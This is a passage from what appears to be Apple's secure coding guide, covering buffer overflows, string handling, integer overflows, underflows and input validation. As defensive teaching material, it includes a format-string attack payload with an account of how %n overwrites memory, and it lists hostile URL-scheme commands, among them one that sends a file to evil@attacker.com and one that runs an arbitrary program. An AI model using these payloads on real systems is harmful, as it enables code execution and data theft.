● certificate-based digital signatures
● encryption of email
● SSL/TLS secure network communication
● Kerberos authentication

The list of security options in iOS includes:

● passcode to prevent unauthorized use of the device
● data encryption
● the ability to add a digital signature to a block of data
● keychain
● SSL/TLS secure network communication

Each service has appropriate uses, and each has limitations. For example, FileVault, which encrypts the contents of a user’s root volume (in OS X v10.7 and later) or home directory (in earlier versions), is a very important security feature for shared computers or computers to which attackers might gain physical access, such as laptops. However, it is not very helpful for computers that are physically secure but that might be attacked over the network while in use, because in that case the home directory is in an unencrypted state and the threat is from insecure networks or shared files.
Also, FileVault is only as secure as the password chosen by the user: if the user selects an easily guessed password, or writes it down in an easily found location, the encryption is useless.

It is a serious mistake to try to create your own encryption method or to implement a published encryption algorithm yourself unless you are already an expert in the field. It is extremely difficult to write secure, robust encryption code that generates unbreakable ciphertext, and it is almost always a security vulnerability to try. For OS X, if you need cryptographic services beyond those provided by the OS X user interface and high-level programming interfaces, you can use the open-source CSSM Cryptographic Services Manager. See the documentation provided with the Open Source security code, which you can download at http://developer.apple.com/darwin/projects/security/. For iOS, the development APIs should provide all the services you need.

For more information about OS X and iOS security features, read Authentication, Authorization, and Permissions Guide.

Social Engineering

Often the weakest link in the chain of security features protecting a user’s data and software is the user. As developers eliminate buffer overflows, race conditions, and other security vulnerabilities, attackers increasingly concentrate on fooling users into executing malicious code or handing over passwords, credit-card numbers, and other private information. Tricking a user into giving up secrets or into giving access to a computer to an attacker is known as social engineering.

For example, in February of 2005, a large firm that maintains credit information, Social Security numbers, and other personal information on virtually all U.S. citizens revealed that they had divulged information on at least 150,000 people to scam artists who had posed as legitimate businessmen. According to Gartner (www.gartner.com), phishing attacks cost U.S.
banks and credit card companies about $1.2 billion in 2003, and this number is increasing. They estimate that between May 2004 and May 2005, approximately 1.2 million computer users in the United States suffered losses caused by phishing.

Software developers can counter such attacks in two ways: through educating their users, and through clear and well-designed user interfaces that give users the information they need to make informed decisions.

For more advice on how to design a user interface that enhances security, see “Designing Secure User Interfaces” (page 73).

Avoiding Buffer Overflows and Underflows

Buffer overflows, both on the stack and on the heap, are a major source of security vulnerabilities in C, Objective-C, and C++ code. This chapter discusses coding practices that will avoid buffer overflow and underflow problems, lists tools you can use to detect buffer overflows, and provides samples illustrating safe code.

Every time your program solicits input (whether from a user, from a file, over a network, or by some other means), there is a potential to receive inappropriate data. For example, the input data might be longer than what you have reserved room for in memory.

When the input data is longer than will fit in the reserved space, if you do not truncate it, that data will overwrite other data in memory. When this happens, it is called a buffer overflow. If the memory overwritten contained data essential to the operation of the program, this overflow causes a bug that, being intermittent, might be very hard to find. If the overwritten data includes the address of other code to be executed and the user has done this deliberately, the user can point to malicious code that your program will then execute.
Similarly, when the input data is or appears to be shorter than the reserved space (due to erroneous assumptions, incorrect length values, or copying raw data as a C string), this is called a buffer underflow. This can cause any number of problems from incorrect behavior to leaking data that is currently on the stack or heap.

Although most programming languages check input against storage to prevent buffer overflows and underflows, C, Objective-C, and C++ do not. Because many programs link to C libraries, vulnerabilities in standard libraries can cause vulnerabilities even in programs written in “safe” languages. For this reason, even if you are confident that your code is free of buffer overflow problems, you should limit exposure by running with the least privileges possible. See “Elevating Privileges Safely” (page 59) for more information on this topic.

Keep in mind that obvious forms of input, such as strings entered through dialog boxes, are not the only potential source of malicious input. For example:

1. Buffer overflows in one operating system’s help system could be caused by maliciously prepared embedded images.
2. A commonly used media player failed to validate a specific type of audio file, allowing an attacker to execute arbitrary code by causing a buffer overflow with a carefully crafted audio file.

[1. CVE-2006-1591; 2. CVE-2006-1370]

There are two basic categories of overflow: stack overflows and heap overflows. These are described in more detail in the sections that follow.

Stack Overflows

In most operating systems, each application has a stack (and multithreaded applications have one stack per thread). This stack contains storage for locally scoped data.

The stack is divided up into units called stack frames. Each stack frame contains all data specific to a particular call to a particular function.
This data typically includes the function’s parameters, the complete set of local variables within that function, and linkage information (that is, the address of the function call itself, where execution continues when the function returns). Depending on compiler flags, it may also contain the address of the top of the next stack frame. The exact content and order of data on the stack depends on the operating system and CPU architecture.

Each time a function is called, a new stack frame is added to the top of the stack. Each time a function returns, the top stack frame is removed. At any given point in execution, an application can only directly access the data in the topmost stack frame. (Pointers can get around this, but it is generally a bad idea to do so.) This design makes recursion possible because each nested call to a function gets its own copy of local variables and parameters.

Figure 2-1 illustrates the organization of the stack. Note that this figure is schematic only; the actual content and order of data put on the stack depends on the architecture of the CPU being used. See OS X ABI Function Call Guide for descriptions of the function-calling conventions used in all the architectures supported by OS X.

Figure 2-1 Schematic view of the stack

Function A frame: Function A data; Parameters for call to function B; Function A return address
Function B frame: Function B data; Parameters for call to function C; Function B return address
Function C frame: Function C data; Space for parameters for next subroutine call; Function C return address

In general, an application should check all input data to make sure it is appropriate for the purpose intended (for example, making sure that a filename is of legal length and contains no illegal characters). Unfortunately, in many cases, programmers do not bother, assuming that the user will not do anything unreasonable.
This becomes a serious problem when the application stores that data into a fixed-size buffer. If the user is malicious (or opens a file that contains data created by someone who is malicious), he or she might provide data that is longer than the size of the buffer. Because the function reserves only a limited amount of space on the stack for this data, the data overwrites other data on the stack.

As shown in Figure 2-2, a clever attacker can use this technique to overwrite the return address used by the function, substituting the address of the attacker’s own code. Then, when function C completes execution, rather than returning to function B, it jumps to the attacker’s code.

Because the application executes the attacker’s code, the attacker’s code inherits the user’s permissions. If the user is logged on as an administrator (the default configuration in OS X), the attacker can take complete control of the computer, reading data from the disk, sending emails, and so forth. (In iOS, applications are much more restricted in their privileges and are unlikely to be able to take complete control of the device.)

Figure 2-2 Stack after malicious buffer overflow

Function A frame: Function A data; Parameters for call to function B; Function A return address
Function B frame: Function B data; Parameters for call to function C; Function B return address
Function C frame: Function C data; Space for parameters for next subroutine call; Function C return address
Additional labels in the figure: Parameter overflow; Address of attacker’s code

In addition to attacks on the linkage information, an attacker can also alter program operation by modifying local data and function parameters on the stack. For example, instead of connecting to the desired host, the attacker could modify a data structure so that your application connects to a different (malicious) host.
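As a hedged illustration of the defensive side of this section, the sketch below copies untrusted input into a fixed-size stack buffer only after checking its length. The function name greet and the 32-byte buffer are hypothetical and do not come from the original guide; the point is only that the length check, rather than the caller's good behavior, keeps the data inside the stack frame.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/*
 * Build a greeting from an untrusted name. Returns 0 on success, or -1 if
 * the name does not fit in the local buffer or the result does not fit in out.
 */
int greet(const char *untrusted_name, char *out, size_t out_size)
{
    char name[32];  /* fixed-size buffer in this function's stack frame */

    assert(untrusted_name != NULL && out != NULL);

    size_t len = strlen(untrusted_name);
    if (len >= sizeof(name))
        return -1;  /* reject rather than overwrite neighboring stack data */

    memcpy(name, untrusted_name, len + 1);  /* length verified; includes the terminator */

    int written = snprintf(out, out_size, "Hello, %s!", name);
    if (written < 0 || (size_t)written >= out_size)
        return -1;  /* output would have been truncated */
    return 0;
}
```

Rejecting over-length input is one design choice; truncating it is another, but the caller then has to cope with a name that no longer matches what was supplied.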
Heap Overflows

As mentioned previously, the heap is used for all dynamically allocated memory in your application. When you use malloc, new, or equivalent functions to allocate a block of memory or instantiate an object, the memory that backs those pointers is allocated on the heap.

Because the heap is used to store data but is not used to store the return address value of functions and methods, and because the data on the heap changes in a nonobvious way as a program runs, it is less obvious how an attacker can exploit a buffer overflow on the heap. To some extent, it is this nonobviousness that makes heap overflows an attractive target: programmers are less likely to worry about them and defend against them than they are for stack overflows.

Figure 2-3 illustrates a heap overflow overwriting a pointer.

Figure 2-3 Heap overflow

(Diagram labels: Data, Buffer, Buffer overflow, Pointer. The overflow from the buffer extends into the adjacent pointer.)

In general, exploiting a buffer overflow on the heap is more challenging than exploiting an overflow on the stack. However, many successful exploits have involved heap overflows. There are two ways in which heap overflows are exploited: by modifying data and by modifying objects.

An attacker can exploit a buffer overflow on the heap by overwriting critical data, either to cause the program to crash or to change a value that can be exploited later (overwriting a stored user ID to gain additional access, for example). Modifying this data is known as a non-control-data attack. Much of the data on the heap is generated internally by the program rather than copied from user input; such data can be in relatively consistent locations in memory, depending on how and when the application allocates it.
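The non-control-data attack described above can be pictured with a heap-allocated record in which a buffer sits next to a security-relevant field. The sketch below is an illustration under stated assumptions, not code from the original guide: struct account, account_set_name, and the field sizes are hypothetical. The bounded write with snprintf (used here as a portable stand-in for strlcpy) keeps an oversized name from spilling into the adjacent uid field.

```c
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical record: an overflow of name would land on uid. */
struct account {
    char name[16];
    unsigned int uid;
};

/*
 * Store an untrusted name in the record. Returns 0 on success, or -1 if
 * the name does not fit; in that case the stored name is left empty.
 */
int account_set_name(struct account *acct, const char *untrusted_name)
{
    assert(acct != NULL && untrusted_name != NULL);

    /* snprintf writes at most sizeof(acct->name) bytes, terminator included. */
    int needed = snprintf(acct->name, sizeof(acct->name), "%s", untrusted_name);
    if (needed < 0 || (size_t)needed >= sizeof(acct->name)) {
        acct->name[0] = '\0';  /* discard the truncated value */
        return -1;
    }
    return 0;
}
```

With a record obtained from malloc, a call with an over-length name returns -1 and leaves uid untouched, whereas an unbounded strcpy into the same field could overwrite it.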
An attacker can also exploit a buffer overflow on the heap by overwriting pointers. In many languages, such as C++ and Objective-C, objects allocated on the heap contain tables of function and data pointers. By exploiting a buffer overflow to change such pointers, an attacker can potentially substitute different data or even replace the instance methods in a class object.

Exploiting a buffer overflow on the heap might be a complex, arcane problem to solve, but crackers thrive on just such challenges. For example:

1. A heap overflow in code for decoding a bitmap image allowed remote attackers to execute arbitrary code.
2. A heap overflow vulnerability in a networking server allowed an attacker to execute arbitrary code by sending an HTTP POST request with a negative “Content-Length” header.

[1. CVE-2006-0006; 2. CVE-2005-3655]

String Handling

Strings are a common form of input. Because many string-handling functions have no built-in checks for string length, strings are frequently the source of exploitable buffer overflows. Figure 2-4 illustrates the different ways three string copy functions handle the same over-length string.

Figure 2-4 C string handling functions and buffer overflows

    char destination[5];
    char *source = "LARGER";

    strcpy(destination, source);                         /* L A R G E R \0 */
    strncpy(destination, source, sizeof(destination));   /* L A R G E      */
    strlcpy(destination, source, sizeof(destination));   /* L A R G \0     */

As you can see, the strcpy function merely writes the entire string into memory, overwriting whatever came after it.

The strncpy function truncates the string to the correct length, but without the terminating null character. When this string is read, then, all of the bytes in memory following it, up to the next null character, might be read as part of the string. Although this function can be used safely, it is a frequent source of programmer
mistakes, and thus is regarded as moderately unsafe. To safely use strncpy, you must either explicitly zero the last byte of the buffer after calling strncpy or pre-zero the buffer and then pass in a maximum length that is one byte smaller than the buffer size.

Only the strlcpy function is fully safe, truncating the string to one byte smaller than the buffer size and adding the terminating null character.

Table 2-1 summarizes the common C string-handling routines to avoid and which to use instead.

Table 2-1 String functions to use and avoid

Don’t use these functions    Use these instead
strcat                       strlcat
strcpy                       strlcpy
strncat                      strlcat
strncpy                      strlcpy
sprintf                      snprintf or asprintf (see note)
vsprintf                     vsnprintf or vasprintf (see note)
gets                         fgets (see note)

Security Note for snprintf and vsnprintf: The functions snprintf, vsnprintf, and variants are dangerous if used incorrectly. Although they do behave functionally like strlcat and similar in that they limit the bytes written to n-1, the length returned by these functions is the length that would have been printed if n were infinite. For this reason, you must not use this return value to determine where to null-terminate the string or to determine how many bytes to copy from the string at a later time.

Security Note for fgets: Although the fgets function provides the ability to read a limited amount of data, you must be careful when using it. Like the other functions in the “safer” column, fgets always terminates the string. Its size argument, however, is a frequent source of confusion. The conservative approach is to pass a size value that is one fewer than the size of the buffer, which always leaves room for the null termination.
Passing the smaller value is harmless, but note that the C standard defines fgets as reading at most one fewer than the specified number of characters before appending the null terminator, so a conforming implementation that is given the full buffer size does not write past the end of the buffer.

You can also avoid string handling buffer overflows by using higher-level interfaces.

● If you are using C++, the ANSI C++ string class avoids buffer overflows, though it doesn’t handle non-ASCII encodings (such as UTF-8).
● If you are writing code in Objective-C, use the NSString class. Note that an NSString object has to be converted to a C string in order to be passed to a C routine, such as a POSIX function.
● If you are writing code in C, you can use the Core Foundation representation of a string, referred to as a CFString, and the string-manipulation functions in the CFString API.

The Core Foundation CFString is “toll-free bridged” with its Cocoa Foundation counterpart, NSString. This means that the Core Foundation type is interchangeable in function or method calls with its equivalent Foundation object. Therefore, in a method where you see an NSString * parameter, you can pass in a value of type CFStringRef, and in a function where you see a CFStringRef parameter, you can pass in an NSString instance. This also applies to concrete subclasses of NSString.

See CFString Reference, Foundation Framework Reference, and Carbon-Cocoa Integration Guide for more details on using these representations of strings and on converting between CFString objects and NSString objects.

Calculating Buffer Sizes

When working with fixed-length buffers, you should always use sizeof to calculate the size of a buffer, and then make sure you don’t put more data into the buffer than it can hold. Even if you originally assigned a static size to the buffer, either you or someone else maintaining your code in the future might change the buffer size but fail to change every case where the buffer is written to.
The first example, Table 2-2, shows two ways of allocating a character buffer 1024 bytes in length, checking the length of an input string, and copying it to the buffer.

Table 2-2 Avoid hard-coded buffer sizes

Instead of this:

    char buf[1024];
    ...
    if (size <= 1023) {
        ...
    }

    char buf[1024];
    ...
    if (size < 1024) {
        ...
    }

Do this:

    #define BUF_SIZE 1024
    ...
    char buf[BUF_SIZE];
    ...
    if (size < BUF_SIZE) {
        ...
    }

    char buf[1024];
    ...
    if (size < sizeof(buf)) {
        ...
    }

The two snippets under “Instead of this” are safe as long as the original declaration of the buffer size is never changed. However, if the buffer size gets changed in a later version of the program without changing the test, then a buffer overflow will result.

The two snippets under “Do this” show safer versions of this code. In the first version, the buffer size is set using a constant that is set elsewhere, and the check uses the same constant. In the second version, the buffer is set to 1024 bytes, but the check calculates the actual size of the buffer. In either of these snippets, changing the original size of the buffer does not invalidate the check.

Table 2-3 shows a function that adds an .ext suffix to a filename.

Table 2-3 Avoid unsafe concatenation

Instead of this:

    {
        char file[MAX_PATH];
        ...
        addsfx(file);
        ...
    }

    static const char *suffix = ".ext";

    char *addsfx(char *buf)
    {
        return strcat(buf, suffix);
    }

Do this:

    {
        char file[MAX_PATH];
        ...
        addsfx(file, sizeof(file));
        ...
    }

    static const char *suffix = ".ext";

    size_t addsfx(char *buf, size_t size)
    {
        size_t ret = strlcat(buf, suffix, size);
        if (ret >= size) {
            fprintf(stderr, "Buffer too small....\n");
        }
        return ret;
    }

Both versions use the maximum path length for a file as the buffer size. The unsafe version (under “Instead of this”) assumes that the filename does not exceed this limit, and appends the suffix without checking the length of the string.
The safer version (under “Do this”) uses the strlcat function, which truncates the string if it exceeds the size of the buffer.

Important: You should always use an unsigned variable (such as size_t) when calculating sizes of buffers and of data going into buffers. Because a negative signed value has the same bit pattern as a large unsigned value, if you use signed variables, an attacker might be able to cause a miscalculation in the size of the buffer or data by supplying a large number to your program. See “Avoiding Integer Overflows And Underflows” (page 27) for more information on potential problems with integer arithmetic.

For a further discussion of this issue and a list of more functions that can cause problems, see Wheeler, Secure Programming for Linux and Unix HOWTO (http://www.dwheeler.com/secure-programs/).

Avoiding Integer Overflows and Underflows

If the size of a buffer is calculated using data supplied by the user, there is the potential for a malicious user to enter a number that is too large for the integer data type, which can cause program crashes and other problems.

In two’s-complement arithmetic (used for signed integer arithmetic by most modern CPUs), a negative number is represented by inverting all the bits of the binary number and adding 1. A 1 in the most-significant bit indicates a negative number. Thus, for 4-byte signed integers,

    0x7fffffff = 2147483647, but 0x80000000 = -2147483648

Therefore, at the hardware level (the C standard itself leaves signed overflow undefined),

    int 2147483647 + 1 = -2147483648

If a malicious user specifies a negative number where your program is expecting only unsigned numbers, your program might interpret it as a very large number. Depending on what that number is used for, your program might attempt to allocate a buffer of that size, causing the memory allocation to fail or causing a heap overflow if the allocation succeeds.
In an early version of a popular web browser, for example, storing objects into a JavaScript array allocated with negative size could overwrite memory. [CVE-2004-0361]

In other cases, if you use signed values to calculate buffer sizes and test to make sure the data is not too large for the buffer, a sufficiently large block of data will appear to have a negative size, and will therefore pass the size test while overflowing the buffer.

Depending on how the buffer size is calculated, specifying a negative number could result in a buffer too small for its intended use. For example, if your program wants a minimum buffer size of 1024 bytes and adds to that a number specified by the user, an attacker might cause you to allocate a buffer smaller than the minimum size by specifying a large positive number, as follows (in 32-bit arithmetic):

    1024 + 4294966784 = 512
    0x400 + 0xFFFFFE00 = 0x200

Also, any bits that overflow past the length of an integer variable (whether signed or unsigned) are dropped. For example, when stored in a 32-bit integer, 2**32 == 0. Because it is not illegal to have a buffer with a size of 0, and because malloc(0) returns a pointer to a small block, your code might run without errors if an attacker specifies a value that causes your buffer size calculation to be some multiple of 2**32. In other words, for any values of n and m where (n * m) mod 2**32 == 0, allocating a buffer of size n*m results in a valid pointer to a buffer of some very small (and architecture-dependent) size. In that case, a buffer overflow is assured.

To avoid such problems, when performing buffer math, you should always include checks to make sure no integer overflow occurred.

A common mistake when performing these tests is to check the result of the multiplication or other operation:

    size_t bytes = n * m;
    if (bytes < n || bytes < m) { /* BAD BAD BAD */
        ...
    /* allocate "bytes" space */
}

Unfortunately, such a test is not reliable. The C language specification allows the compiler to optimize out tests of this kind when the arithmetic is signed [CWE-733, CERT VU#162289], and even with unsigned arithmetic a product that has wrapped around is not necessarily smaller than either operand. Thus, the only correct way to test for integer overflow is to divide the maximum allowable result by the multiplier and compare the result to the multiplicand, or vice versa. If the result is smaller than the multiplicand, the product of those two values would cause an integer overflow. For example:

size_t bytes = n * m;
if (n > 0 && m > 0 && SIZE_MAX/n >= m) {
    ... /* allocate "bytes" space */
}

Detecting Buffer Overflows

To test for buffer overflows, you should attempt to enter more data than is asked for wherever your program accepts input. Also, if your program accepts data in a standard format, such as graphics or audio data, you should attempt to pass it malformed data. This process is known as fuzzing.

If there are buffer overflows in your program, it will eventually crash. (Unfortunately, it might not crash until some time later, when it attempts to use the data that was overwritten.) The crash log might provide some clues that the cause of the crash was a buffer overflow. If, for example, you enter a string containing the uppercase letter “A” several times in a row, you might find a block of data in the crash log that repeats the number 41, the ASCII code for “A” (see Figure 2-5). If the program is trying to jump to a location that is actually an ASCII string, that’s a sure sign that a buffer overflow was responsible for the crash.
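Returning briefly to the division-based overflow test described under “Avoiding Integer Overflows and Underflows”: one way to avoid repeating that test at every call site is to wrap it in a small helper. The following is a minimal sketch, not a definitive implementation; mul_size_checked and alloc_array are hypothetical names chosen for illustration, and rejecting zero-sized requests is a design assumption made here so that callers never receive a tiny malloc(0) block.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* Hypothetical helper: compute n * m without wrapping.
 * Returns 1 and stores the product in *out, or returns 0 if the
 * product would not fit in a size_t. */
int mul_size_checked(size_t n, size_t m, size_t *out)
{
    if (n != 0 && m > SIZE_MAX / n) {
        return 0;               /* n * m would overflow */
    }
    *out = n * m;
    return 1;
}

/* Hypothetical wrapper: allocate room for n elements of m bytes each.
 * Returns NULL for zero-sized or overflowing requests (an assumption
 * of this sketch), or whatever malloc returns otherwise. */
void *alloc_array(size_t n, size_t m)
{
    size_t bytes;

    if (n == 0 || m == 0) {
        return NULL;
    }
    if (!mul_size_checked(n, m, &bytes)) {
        return NULL;
    }
    return malloc(bytes);
}
```

The check is performed before the multiplication result is used, so the allocation size can never be a wrapped value. The standard calloc function is expected to perform an equivalent check internally, but a helper like this is useful when the size feeds something other than an allocation.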
Figure 2-5 Buffer overflow crash log

Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_INVALID_ADDRESS (0x0001) at 0x41414140

Thread 0 Crashed:

Thread 0 crashed with PPC Thread State 64:
  srr0: 0x0000000041414140 srr1: 0x000000004200f030 vrsave: 0x0000000000000000
    cr: 0x48004242          xer: 0x0000000020000007  lr: 0x0000000041414141 ctr: 0x000000009077401c
    r0: 0x0000000041414141   r1: 0x00000000bfffe660  r2: 0x0000000000000000  r3: 0x0000000000000001
    r4: 0x0000000000000041   r5: 0x00000000bfffdd50  r6: 0x0000000000000052  r7: 0x00000000bfffe638
    r8: 0x0000000090774028   r9: 0x00000000bfffddd8 r10: 0x00000000bfffe380 r11: 0x0000000024004248
   r12: 0x000000009077401c  r13: 0x00000000a365c7c0 r14: 0x0000000000000100 r15: 0x0000000000000000
   r16: 0x00000000a364c75c  r17: 0x00000000a365c75c r18: 0x00000000a365c75c r19: 0x00000000a366c75c
   r20: 0x0000000000000000  r21: 0x0000000000000000 r22: 0x00000000a365c75c r23: 0x000000000034f5b0
   r24: 0x00000000a3662aa4  r25: 0x000000000054c840 r26: 0x00000000a3662aa4 r27: 0x0000000000002f44
   r28: 0x000000000034c840  r29: 0x0000000041414141 r30: 0x0000000041414141 r31: 0x0000000041414141

If there are any buffer overflows in your program, you should always assume that they are exploitable and fix them. It is much harder to prove that a buffer overflow is not exploitable than to just fix the bug. Also note that, although you can test for buffer overflows, you cannot test for the absence of buffer overflows; it is necessary, therefore, to carefully check every input and every buffer size calculation in your code.

For more information on fuzzing, see “Fuzzing” (page 39) in “Validating Input And Interprocess Communication” (page 33).

Avoiding Buffer Underflows

Fundamentally, buffer underflows occur when two parts of your code disagree about the size of a buffer or the data in that buffer. For example, a fixed-length C string variable might have room for 256 bytes, but might contain a string that is only 12 bytes long.
Buffer underflow conditions are not always dangerous; they become dangerous when correct operation depends upon both parts of your code treating the data in the same way. This often occurs when you read the buffer to copy it to another block of memory, to send it across a network connection, and so on.

There are two broad classes of buffer underflow vulnerabilities: short writes and short reads.

A short write vulnerability occurs when a short write to a buffer fails to fill the buffer completely. When this happens, some of the data that was previously in the buffer is still present after the write. If the application later performs an operation on the entire buffer (writing it to disk or sending it over the network, for example), that existing data comes along for the ride. The data could be random garbage data, but if the data happens to be interesting, you have an information leak.

Further, when such an underflow occurs, if the values in those locations affect program flow, the underflow can potentially cause incorrect behavior up to and including allowing you to skip past an authentication or authorization step by leaving the existing authorization data on the stack from a previous call by another user, application, or other entity.

Short write example (system call): For example, consider a UNIX system call that requires a command data structure, and includes an authorization token in that data structure. Assume that there are multiple versions of the data structure, with different lengths, so the system call takes both the structure and the length. Assume that the authorization token is fairly far down in the structure. Suppose a malicious application passes in a command structure, and passes a size that encompasses the data up to, but not including, the authorization token.
The kernel’s system call handler calls copyin, which copies a certain number of bytes from the application into the data structure in the kernel’s address space. If the kernel does not zero-fill that data structure, and if the kernel does not check to see if the size is valid, there is a narrow possibility that the stack might still contain the previous caller’s authorization token at the same address in kernel memory. Thus, the attacker is able to perform an operation that should have been disallowed.

A short read vulnerability occurs when a read from a buffer fails to read the complete contents of a buffer. If the program then makes decisions based on that short read, any number of erroneous behaviors can result. This usually occurs when a C string function is used to read from a buffer that does not actually contain a valid C string.

A C string is defined as a string containing a series of bytes that ends with a null terminator. By definition, it cannot contain any null bytes prior to the end of the string. As a result, C-string-based functions, such as strlen, strlcpy, and strdup, copy a string until the first null terminator, and have no knowledge of the size of the original source buffer.

By contrast, strings in other formats (a CFStringRef object, a Pascal string, or a CFDataRef blob) have an explicit length and can contain null bytes at arbitrary locations in the data. If you convert such a string into a C string and then evaluate that C string, you get incorrect behavior because the resulting C string effectively ends at the first null byte.

Short read example (SSL verification): An example of a short read vulnerability occurred in many SSL stacks a few years ago. By applying for an SSL cert for a carefully crafted subdomain of a domain that you own, you could effectively create a certificate that was valid for arbitrary domains.
Consider a subdomain in the form targetdomain.tld[null_byte].yourdomain.tld. Because the certificate signing request contains a Pascal string, assuming that the certificate authority interprets it correctly, the certificate authority would contact the owner of yourdomain.tld and would ask for permission to deliver the certificate. Because you own the domain, you would agree to it. You would then have a certificate that is valid for the rather odd-looking subdomain in question.

When checking the certificate for validity, however, many SSL stacks incorrectly converted that Pascal string into a C string without any validity checks. When this happened, the resulting C string contained only the targetdomain.tld portion. The SSL stack then compared that truncated version with the domain the user requested, and interpreted the certificate as being valid for the targeted domain.

In some cases, it was even possible to construct wildcard certificates that were valid for every possible domain in such browsers (*.com[null].yourdomain.tld would match every .com address, for example).

If you obey the following rules, you should be able to avoid most underflow attacks:

● Zero-fill all buffers before use. A buffer that contains only zeros cannot contain stale sensitive information.
● Always check return values and fail appropriately.
● If a call to an allocation or initialization function fails (AuthorizationCopyRights, for example), do not evaluate the resulting data, as it could be stale.
● Use the value returned from read system calls and other similar calls to determine how much data was actually read. Then either:
    ● Use that result to determine how much data is present instead of using a predefined constant, or
    ● Fail if the function did not return the expected amount of data.
● Display an error and fail if a write call, printf call, or other output call returns without writing all of the data, particularly if you might later read that data back.
● When working with data structures that contain length information, always verify that the data is the size you expected.
● Avoid converting non-C strings (CFStringRef objects, NSString objects, Pascal strings, and so on) into C strings if possible. Instead, work with the strings in their original format. If this is not possible, always perform length checks on the resulting C string or check for null bytes in the source data.
● Avoid mixing buffer operations and string operations. If this is not possible, always perform length checks on the resulting C string or check for null bytes in the source data.
● Save files in a fashion that prevents malicious tampering or truncation. (See “Race Conditions and Secure File Operations” (page 43) for more information.)
● Avoid integer overflows and underflows. (See “Calculating Buffer Sizes” (page 25) for details.)

Validating Input and Interprocess Communication

A major, and growing, source of security vulnerabilities is the failure of programs to validate all input from outside the program, that is, data provided by users, from files, over the network, or by other processes. This chapter describes some of the ways in which unvalidated input can be exploited, and some coding techniques to practice and to avoid.

Risks of Unvalidated Input

Any time your program accepts input from an uncontrolled source, there is a potential for a user to pass in data that does not conform to your expectations. If you don’t validate the input, it might cause problems ranging from program crashes to allowing an attacker to execute their own code.
There are a number of ways an attacker can take advantage of unvalidated input, including:

● Buffer overflows
● Format string vulnerabilities
● URL commands
● Code insertion
● Social engineering

Many Apple security updates have been to fix input vulnerabilities, including a couple of vulnerabilities that hackers used to “jailbreak” iPhones. Input vulnerabilities are common and are often easily exploitable, but are also usually easily remedied.

Causing a Buffer Overflow

If your application takes input from a user or other untrusted source, it should never copy data into a fixed-length buffer without checking the length and truncating it if necessary. Otherwise, an attacker can use the input field to cause a buffer overflow. See “Avoiding Buffer Overflows And Underflows” (page 17) to learn more.

Format String Attacks

If you are taking input from a user or other untrusted source and displaying it, you need to be careful that your display routines do not process format strings received from the untrusted source. For example, in the following code the syslog standard C library function is used to write a received HTTP request to the system log. Because the syslog function processes format strings, it will process any format strings included in the input packet:

/* receiving http packet */
int size = recv(fd, pktBuf, sizeof(pktBuf) - 1, 0);  /* leave room for a terminator */
if (size > 0) {                                       /* recv returns -1 on error */
    pktBuf[size] = '\0';
    syslog(LOG_INFO, "Received new HTTP request!");
    syslog(LOG_INFO, pktBuf);   /* VULNERABLE: untrusted data used as the format string */
}

Many format strings can cause problems for applications. For example, suppose an attacker passes the following string in the input packet:

"AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%n"

This string retrieves eight items from the stack. Assuming that the format string itself is stored on the stack, depending on the structure of the stack, this might effectively move the stack pointer back to the beginning of the format string.
Then the %n token would cause the print function to take the number of bytes written so far and write that value to the memory address stored in the next parameter, which happens to be the format string. Thus, assuming a 32-bit architecture, the AAAA in the format string itself would be treated as the pointer value 0x41414141, and the value at that address would be overwritten with the number 76.

Doing this will usually cause a crash the next time the system has to access that memory location, but by using a string carefully crafted for a specific device and operating system, the attacker can write arbitrary data to any location. See the manual page for printf(3) for a full description of format string syntax.

To prevent format string attacks, make sure that no input data is ever passed as part of a format string. To fix this, just include your own format string in each such function call. For example, the call

printf(buffer)

may be subject to attack, but the call

printf("%s", buffer)

is not. In the second case, all characters in the buffer parameter, including percent signs (%), are printed out rather than being interpreted as formatting tokens.

This situation can be made more complicated when a string is accidentally formatted more than once. In the following example, the informativeTextWithFormat argument of the NSAlert method alertWithMessageText:defaultButton:alternateButton:otherButton:informativeTextWithFormat: calls the NSString method stringWithFormat:GetLocalizedString rather than simply formatting the message string itself.
As a result, the string is formatted twice, and the data from the imported certificate is used as part of the format string for the NSAlert method:

alert = [NSAlert alertWithMessageText:@"Certificate Import Succeeded"
                        defaultButton:@"OK"
                      alternateButton:nil
                          otherButton:nil
            informativeTextWithFormat:[NSString stringWithFormat:
                @"The imported certificate \"%@\" has been selected in the certificate pop-up.",
                [selectedCert identifier]]];
[alert setAlertStyle:NSInformationalAlertStyle];
[alert runModal];

Instead, the string should be formatted only once, by passing the format string and its argument directly as the informativeTextWithFormat: parameter:

alert = [NSAlert alertWithMessageText:@"Certificate Import Succeeded"
                        defaultButton:@"OK"
                      alternateButton:nil
                          otherButton:nil
            informativeTextWithFormat:@"The imported certificate \"%@\" has been selected in the certificate pop-up.",
                                      [selectedCert identifier]];

The following commonly-used functions and methods are subject to format-string attacks:

● Standard C
    ● printf and other functions listed on the printf(3) manual page
    ● scanf and other functions listed on the scanf(3) manual page
    ● syslog and vsyslog
● Carbon
    ● CFStringCreateWithFormat
    ● CFStringCreateWithFormatAndArguments
    ● CFStringAppendFormat
    ● AEBuildDesc
    ● AEBuildParameters
    ● AEBuildAppleEvent
● Cocoa
    ● [NSString stringWithFormat:] and other NSString methods that take formatted strings as arguments
    ● [NSString initWithFormat:] and other NSString methods that take format strings as arguments
    ● [NSMutableString appendFormat:]
    ● [NSAlert alertWithMessageText:defaultButton:alternateButton:otherButton:informativeTextWithFormat:]
    ● [NSPredicate predicateWithFormat:] and [NSPredicate predicateWithFormat:arguments:]
    ● [NSException raise:format:] and [NSException raise:format:arguments:]
    ● NSRunAlertPanel and other Application Kit functions that create or return panels or sheets

URLs and File Handling

If your application has registered a URL scheme, you have to be careful about how you process commands sent to your application through the URL string.
Whether you make the commands public or not, hackers will try sending commands to your application. If, for example, you provide a link or links to launch your application from your web site, hackers will look to see what commands you’re sending and will try every variation on those commands they can think of. You must be prepared to handle, or to filter out, any commands that can be sent to your application, not only those commands that you would like to receive.

For example, if you accept a command that causes your application to send credentials back to your web server, don’t make the function handler so general that an attacker can substitute the URL of their own web server. Here are some examples of the sorts of commands that you should not accept:

● myapp://cmd/run?program=/path/to/program/to/run
● myapp://cmd/set_preference?use_ssl=false
● myapp://cmd/sendfile?to=evil@attacker.com&file=some/data/file
● myapp://cmd/delete?data_to_delete=my_document_ive_been_working_on
